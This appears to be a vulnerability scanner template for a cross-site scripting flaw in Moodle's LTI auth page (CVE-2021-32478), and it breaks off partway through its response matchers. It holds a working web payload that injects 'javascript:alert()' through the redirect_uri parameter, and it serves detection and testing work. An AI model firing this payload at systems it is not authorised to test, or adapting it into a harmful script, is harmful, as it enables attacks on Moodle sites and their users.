id: moodle-xss info: name: Moodle - Cross-Site Scripting author: hackergautam severity: medium description: Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter. reference: - https://twitter.com/JacksonHHax/status/1391367064154042377 - https://nvd.nist.gov/vuln/detail/CVE-2021-32478 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 tags: moodle,xss requests: - method: GET path: - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')" matchers-condition: and matchers: - type: word part: body words: - '{{randstr}}' - '